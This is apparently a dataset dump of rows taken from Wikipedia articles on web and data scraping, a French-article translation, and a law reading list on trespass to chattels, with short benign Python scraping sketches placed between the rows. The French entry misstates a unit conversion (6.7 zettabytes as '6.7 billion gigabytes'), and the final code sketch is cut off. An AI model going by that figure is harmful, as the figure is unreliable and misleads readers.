Computer-to-user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data into numeric data for inclusion in calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally, Reuters used the term "logicized" for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine or, for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation of these techniques is to use, instead of a sequence of screens, a set of images or PDF files as input, so there is some overlap with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server; a short sketch of this JSON-feed approach appears after this entry. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
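Report mining, as described at the end of the entry above, can be approximated by reading a spooled plain-text report and recovering its fields with a regular expression. The report layout assumed in the comment below is invented purely for illustration.

import re

# Example line layout assumed for illustration:
#   2024-01-15  INV-00042   ACME Corp          1,250.00
LINE_PATTERN = re.compile(
    r"(?P<date>\d{4}-\d{2}-\d{2})\s+(?P<invoice>INV-\d+)\s+(?P<customer>.+?)\s+(?P<amount>[\d,]+\.\d{2})$"
)

def mine_report(path):
    # Walk the spooled report line by line and keep every line that matches the layout
    records = []
    with open(path, encoding="utf-8") as f:
        for line in f:
            match = LINE_PATTERN.search(line.rstrip())
            if match:
                row = match.groupdict()
                row["amount"] = float(row["amount"].replace(",", ""))
                records.append(row)
    return records

# rows = mine_report("spooled_report.txt")  # path to a report captured from the print spool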
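The JSON-feed style of scraping mentioned earlier in that entry can be sketched as follows; the endpoint and response shape are hypothetical examples of the kind of XHR/JSON URL a site's front end might call.

import requests

def fetch_json_feed(endpoint, params=None):
    # Many modern sites load their data from JSON endpoints rather than embedding it in HTML
    response = requests.get(endpoint, params=params, timeout=10)
    response.raise_for_status()
    return response.json()

# Hypothetical endpoint; in practice it is discovered via the browser's network inspector
data = fetch_json_feed("https://example.com/api/products", params={"page": 1})
for item in data.get("items", []):
    print(item.get("name"), item.get("price"))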
256 | https://en.wikipedia.org/wiki/Web_scraping | https://fr.wikipedia.org/wiki/Web_scraping | Web scraping, sometimes called harvesting or, in French, moissonnage 1 , is a technique for the automated retrieval and organization of web data; it is the main form of data mining and of extracting data from websites, via a script or a program. It aims to capture data in order to transform it and/or reuse it in another context, such as enriching databases, search-engine referencing 2 , data exploration, or deep learning for artificial intelligence. The objective is often commercial, but sometimes scientific or political. Benefiting from advances in software and in data science, within the digital economy, the surveillance economy and the commercial and political exploitation of big data, web harvesting has spread exponentially, sometimes illegally, or by exploiting legal grey areas and gaps. The stakes are notably commercial and political, but also ethical, legal and philosophical, because scraping endangers data protection and the security of individuals and of certain groups. These stakes become critical with the emergence of artificial intelligence (generative and multimodal in particular), which makes it possible to misuse stolen, or seemingly banal and uninteresting, data scraped massively from the Internet for criminal activities or for propaganda, including electoral propaganda, as shown by the Facebook-Cambridge Analytica/AggregateIQ scandal and the growing spread of targeted fake news. Among the emerging issues is the use of artificial intelligence, which both facilitates harvesting and makes it possible to extract far more information from it, including sensitive information about private life. Today, researchers increasingly rely on artificial intelligence (for example machine learning, sentiment analysis and/or deep learning) to extract meaning and inference from web data 3 . Recent data-harvesting tools make it possible to extract and collect, then process (classify, verify, clean, aggregate and structure), data (original or duplicated), generally drawn from big web data whose volume is growing exponentially (multiplied by more than thirty in ten years, from 2 zettabytes in 2010 to 64 zettabytes in 2023) 4 . This data is most often captured directly from the source code of web pages (current or archived) and from web platforms (social networks in particular). According to Statista, around 64,000 billion gigabytes of data were generated in 2020, of which only a small percentage will be kept, since worldwide storage capacity was "only" 6.7 zettabytes in 2020 (about 6.7 billion gigabytes). The volume of web data is nevertheless expected to exceed 180 zettabytes around 2025, owing to the development of connected objects and 5G. 
With growing efficiency and speed (linked to advances in computing), these tools make it possible, on a large scale, to extract, structure, analyse and evaluate, then store, manipulate and possibly commercialise, this data and derived (secondary) data. The databases thus produced can include a great deal of personal information and data on all kinds of socio-economic, cultural, media, military and other entities. They make it possible to build very detailed psychological, social and economic profiles of billions of people, as well as profiles of companies, NGOs, and so on. Anonymised, this data was first used for various scientific studies (in epidemiology, sociology and anthropology, for example), but in a world increasingly centred on the information economy it has become a strategic resource comparable in value to land, gold and oil 5 , 6 , much sought after by specialised agencies or companies that sell the aggregated data to banks, insurers, certain political groups, and to authoritarian states and dictatorships (which use it to target and control citizens and various entities). Since sophisticated algorithms and artificial intelligence can easily de-anonymise large amounts of personal data (including health data), the massive and permanent harvesting of web data by governments and by a growing number of private web platforms and agencies whose business model rests on the data trade raises serious ethical and political concerns about the protection of privacy and of sensitive data. Frequently cited abuses include the mass surveillance of citizens (including their own) and of economic competitors by the United States, Russia and China in particular 7 . Examples include the American systems of generalised espionage (brought to light by whistle-blowers such as Julian Assange, Chelsea Manning and Edward Snowden), the Russian troll farms, and the Chinese social credit system (SCS), the first nationwide, digitally implemented social rating system, which aims to improve trustworthiness within Chinese society and is also designed to improve moral behaviour, financial reliability and social control 7 . Web scraping threatens the four basic rights and states of privacy set out by Westin in 1962 (the right to solitude 8 , to intimacy, to anonymity in a crowd and to reserve) in a growing number of situations 9 , as well as the protection of the content of e-mail 10 , which forms part of the right to privacy 11 . 
Scraping must respect commercial and/or intellectual property and, in the European Union, the GDPR. Without prior authorisation, it is permitted only for data that is natively and legally public, that has fallen into the public domain, or that is stored on sites or platforms under a free licence allowing it (some open licences, such as Creative Commons Attribution, stipulate that the right to reuse and/or transform the data applies only to non-commercial uses and/or that the new data must also be published under a similar open licence, citing the original author, the source, the licence, and so on). It must also take account of the permissions expressed by each site: in a website's metadata, robots.txt files can indicate to scraping bots which areas are allowed or forbidden. Any violation of these rules can lead to legal proceedings and fines for infringement of copyright or of data protection, and consequently to a loss of reputation and e-reputation for the companies or individuals responsible for illegal scraping. In the United States, the company hiQ Labs used web scraping on LinkedIn data for recruitment purposes. Following a lawsuit, the United States Court of Appeals for the Ninth Circuit ruled in favour of hiQ in September 2019, considering in particular that users retain ownership of their profiles and that, since the data is freely available on the Internet, it may be collected. The case was then brought before the Supreme Court 12 . In November 2022, the court for the Northern District of California ruled in favour of LinkedIn, Judge Edward Chen citing the fact that hiQ used reverse engineering to knowingly and repeatedly circumvent anti-bot protections by simulating human users 13 . In a 2013 judgment, the Court of Justice of the European Union ruled against the metasearch engine Innoweb, which reused data from the car-sales company Wegener without modifying it 14 . On 30 April 2020, the Commission nationale de l'informatique et des libertés (CNIL) published new guidelines on web scraping 15 . The CNIL guidelines specify that publicly accessible data is still personal data and cannot be reused without the knowledge of the person to whom it belongs 16 . In December 2021, a start-up based at Station F was convicted of computer hacking: using a web-scraping technique, it collected data from the alumni directory of a Paris business school in order to solicit former students for a crowdfunding campaign 17 . The conviction concerned the method of access to the data, namely an impersonation allowing fraudulent access to an automated data-processing system, and not web scraping itself. Many technologies make it possible to extract content from websites via web scraping. Some require software-development skills (frameworks and libraries, or APIs, for example), while others are accessible to the general public and can be used through a graphical interface (browser extensions or software-as-a-service, for instance). There are many frameworks and software libraries, available for several programming languages, for writing web-scraping applications. Some rely on emulating an instance of a web browser in order to perform actions on web pages (such as clicking a link or filling in a form field), which is useful for automated testing or, in the context of web scraping, for extracting data. Web scraping is then said to be performed client-side, which has the advantage of being able to extract dynamic content generated by the JavaScript code present on the page. 
The Node.js library Puppeteer, for example, emulates an instance of the Chromium browser and can perform automated actions, in headless mode or not. Other frameworks and libraries rely on analysing the HTML of the page obtained by making an HTTP request. Since the HTML is not run through a JavaScript engine in this case, scripts on the page are not executed, which is a drawback for scraping the modern web, where page content is often generated dynamically by JavaScript. On the other hand, because it needs neither to interpret JavaScript nor to download all of the page's resources (stylesheets, images, and so on), this method is generally far more economical in resources (RAM, bandwidth, etc.) and therefore faster; this is how the Goutte library (PHP) works, for example. The use of programming interfaces is a good alternative to libraries and frameworks for developers wishing to speed up the development of their web-scraping applications. These application programming interfaces (APIs) generally work as follows: the user makes an HTTP request to an endpoint on a remote server controlled by the service provider; the request carries in its payload the address (URL) of the web page from which data is to be extracted and sometimes other parameters, such as a CSS or XPath selector identifying one or more specific HTML elements from which to extract content; the server then responds with the requested content (a generic sketch of this request pattern appears after this entry). Many companies offer such web-scraping APIs, generally for a fee. A great many software products also automate web scraping, some requiring a little software-development knowledge and others none at all. Shortly after the worldwide expansion of online social networks, extracting data from their sites became a common way of obtaining data sets used, for example, to train artificial intelligences or to profile people, sometimes massively, as in the Facebook-Cambridge Analytica/AggregateIQ scandal 19 . Various countermeasures against scraping exist; the data scraper can in turn deploy its own counter-countermeasures (one of the most common being adversarial training and strong data augmentation) 25 , which will however require it to spend more time and computing resources. |
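The hosted scraping-API pattern described in the entry above (send a URL plus a selector in the request payload, get back the extracted content) can be sketched generically. The endpoint, API key and response format below are hypothetical, since every commercial provider defines its own.

import requests

def scrape_via_api(target_url, css_selector):
    # Hypothetical hosted scraping API: the provider fetches and renders the page server-side
    payload = {
        "url": target_url,
        "selector": css_selector,   # CSS (or XPath) selector identifying the elements to extract
        "render_js": True,          # ask the provider to execute client-side JavaScript first
    }
    response = requests.post(
        "https://api.scraping-provider.example/v1/extract",   # placeholder endpoint
        json=payload,
        headers={"Authorization": "Bearer YOUR_API_KEY"},
        timeout=30,
    )
    response.raise_for_status()
    return response.json()

# result = scrape_via_api("https://example.com/products", "div.product-title")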
257 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-32 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. |
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 to 300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider it in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
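The entry above ends by noting that site administrators can deploy measures to stop or slow bots. On the scraper side, one basic courtesy that pairs with those measures is checking robots.txt before fetching. Below is a minimal sketch using only the Python standard library; the target URL and user-agent name are placeholders, not values taken from any real crawler policy.

from urllib import robotparser
from urllib.parse import urlsplit

def allowed_to_fetch(url, user_agent="example-scraper"):
    """Return True if the site's robots.txt permits this user agent to fetch url."""
    parts = urlsplit(url)
    rp = robotparser.RobotFileParser()
    rp.set_url(f"{parts.scheme}://{parts.netloc}/robots.txt")
    rp.read()  # download and parse robots.txt; missing files are treated as "allow all"
    return rp.can_fetch(user_agent, url)

if __name__ == "__main__":
    # Hypothetical target page used only for illustration.
    print(allowed_to_fetch("https://example.com/some/page"))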
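The same entry also lists extraction libraries such as BeautifulSoup and Scrapy. As a rough illustration of the library-based approach (a minimal sketch, not a production scraper), here is a requests plus BeautifulSoup example; the URL and the choice of h2 elements are arbitrary placeholders.

import requests
from bs4 import BeautifulSoup

def scrape_headings(url):
    """Fetch a page and return the text of all <h2> headings found on it."""
    response = requests.get(url, timeout=10)
    response.raise_for_status()                     # fail loudly on HTTP errors
    soup = BeautifulSoup(response.text, "html.parser")
    return [h2.get_text(strip=True) for h2 in soup.find_all("h2")]

if __name__ == "__main__":
    # Placeholder URL; swap in a real target that permits scraping.
    print(scrape_headings("https://example.com"))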
258 | https://en.wikipedia.org/wiki/Web_scraping | http://www.tomwbell.com/NetLaw/Ch06.html | Thrifty-Tel, Inc. v. Bezenek, 54 Cal. Rptr. 2d 468 (Cal. Ct. App. 1996) (affirming judgment that unauthorized access to telephone system constituted trespass to chattels) an alternate source CompuServe, Inc. v. Cyber Promotions, Inc., 962 F. Supp. 1015 (S.D. Oh. 1997) (granting preliminary injunction on grounds that unsolicited email constituted a trespass to chattels) an alternate source eBay, Inc. v. Bidder's Edge, Inc., 100 F. Supp. 2d 1058 (N.D. Cal. 2000) (granting preliminary injunction on defendant's use of automated querying programs to obtain information off of plaintiff's website and over plaintiff's objections) an alternate source. Intel Corp. v. Hamidi, 30 Cal.4th 1342, 71 P.3d 296, 1 Cal.Rptr.3d 32 (Cal. 2003) (limiting trespass to chattels under California law to acts physically damaging or functionally interfering with property) an alternate source (PDF format) Bell's Classes 12 and 13: Please read the materials in Ch.06. Dan L. Burk, The Trouble With Trespass, 3 J. SMALL EMERGING BUS. L. 1 (1998) (arguing that the Thrifty-Tel, CompuServe, and Intel courts misapplied the law of trespass to chattels and advocating that courts instead analyze such cases under the law of nuisance) an alternate source (PDF format) |
259 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-5 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer-to-user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or, for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
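For the OCR-based screen scraping mentioned above (capturing bitmap data and running it through an OCR engine), a minimal sketch might look like the following. It assumes the third-party Pillow and pytesseract packages plus a locally installed Tesseract engine, none of which appear elsewhere in this document, and the screenshot file name is an invented placeholder.

from PIL import Image
import pytesseract

def text_from_screenshot(path):
    """Run OCR over a captured screen image and return the recognized text."""
    image = Image.open(path)
    return pytesseract.image_to_string(image)

if __name__ == "__main__":
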